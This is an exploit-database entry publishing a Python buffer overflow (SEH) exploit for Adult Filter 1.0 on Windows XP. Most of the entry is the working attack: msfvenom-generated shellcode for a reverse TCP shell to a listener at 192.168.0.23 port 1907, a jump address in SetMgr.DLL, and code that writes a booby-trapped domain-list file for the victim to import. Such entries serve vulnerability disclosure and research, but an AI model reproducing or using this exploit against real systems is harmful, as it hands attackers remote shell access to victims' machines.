Adult Filter 1.0 Buffer Overflow (SEH)

2018.10.29
Credit: AkkuS
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Adult Filter 1.0 - Buffer Overflow (SEH) # Exploit Author: Özkan Mustafa Akkuş (AkkuS) # Discovery Date: 2018-10-25 # Homepage: http://www.armcode.com/adult-filter/ # Software Link: http://www.armcode.com/downloads/adult-filter.exe # Version: 1.0 # Tested on: Windows XP Professional SP3 (ENG) # Steps to Reproduce: Run the python exploit script, it will create a new file # with the name "greetz-phr-key-onkan-cwd.txt". # Start Adult Filter 1.0 click "Options" click "Black Domain List" click "Import" # Select "greetz-cwd-onkan-key-phr.txt" and Click after select "name.txt" "OK" connect victim machine on port 1907 #!/usr/bin/python -w # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a" # Payload size: 351 bytes filename="greetz-cwd-onkan-key-phr.txt" shellcode=("\xba\x80\xfe\xaf\x95\xda\xcb\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" "\x52\x83\xee\xfc\x31\x56\x0e\x03\xd6\xf0\x4d\x60\x2a\xe4\x10" "\x8b\xd2\xf5\x74\x05\x37\xc4\xb4\x71\x3c\x77\x05\xf1\x10\x74" "\xee\x57\x80\x0f\x82\x7f\xa7\xb8\x29\xa6\x86\x39\x01\x9a\x89" "\xb9\x58\xcf\x69\x83\x92\x02\x68\xc4\xcf\xef\x38\x9d\x84\x42" "\xac\xaa\xd1\x5e\x47\xe0\xf4\xe6\xb4\xb1\xf7\xc7\x6b\xc9\xa1" "\xc7\x8a\x1e\xda\x41\x94\x43\xe7\x18\x2f\xb7\x93\x9a\xf9\x89" "\x5c\x30\xc4\x25\xaf\x48\x01\x81\x50\x3f\x7b\xf1\xed\x38\xb8" "\x8b\x29\xcc\x5a\x2b\xb9\x76\x86\xcd\x6e\xe0\x4d\xc1\xdb\x66" "\x09\xc6\xda\xab\x22\xf2\x57\x4a\xe4\x72\x23\x69\x20\xde\xf7" "\x10\x71\xba\x56\x2c\x61\x65\x06\x88\xea\x88\x53\xa1\xb1\xc4" "\x90\x88\x49\x15\xbf\x9b\x3a\x27\x60\x30\xd4\x0b\xe9\x9e\x23" "\x6b\xc0\x67\xbb\x92\xeb\x97\x92\x50\xbf\xc7\x8c\x71\xc0\x83" "\x4c\x7d\x15\x03\x1c\xd1\xc6\xe4\xcc\x91\xb6\x8c\x06\x1e\xe8" "\xad\x29\xf4\x81\x44\xd0\x9f\x6d\x30\xda\x48\x06\x43\xda\x71" "\xa5\xca\x3c\x17\x59\x9b\x97\x80\xc0\x86\x63\x30\x0c\x1d\x0e" "\x72\x86\x92\xef\x3d\x6f\xde\xe3\xaa\x9f\x95\x59\x7c\x9f\x03" "\xf5\xe2\x32\xc8\x05\x6c\x2f\x47\x52\x39\x81\x9e\x36\xd7\xb8" "\x08\x24\x2a\x5c\x72\xec\xf1\x9d\x7d\xed\x74\x99\x59\xfd\x40" "\x22\xe6\xa9\x1c\x75\xb0\x07\xdb\x2f\x72\xf1\xb5\x9c\xdc\x95" "\x40\xef\xde\xe3\x4c\x3a\xa9\x0b\xfc\x93\xec\x34\x31\x74\xf9" "\x4d\x2f\xe4\x06\x84\xeb\x04\xe5\x0c\x06\xad\xb0\xc5\xab\xb0" "\x42\x30\xef\xcc\xc0\xb0\x90\x2a\xd8\xb1\x95\x77\x5e\x2a\xe4" "\xe8\x0b\x4c\x5b\x08\x1e") evil="\x90"*20 + shellcode # Bad chars : "\x00\x0a\x0d\x1a" # 0x03912524 [SetMgr.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False | pop edi # pop esi # ret b = "A"*4108 + "\xEB\x06\x90\x90" + "\x24\x25\x91\x03" + evil+ "B" * (1384-len(evil)) textfile = open (filename, 'w') textfile.write(b) textfile.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top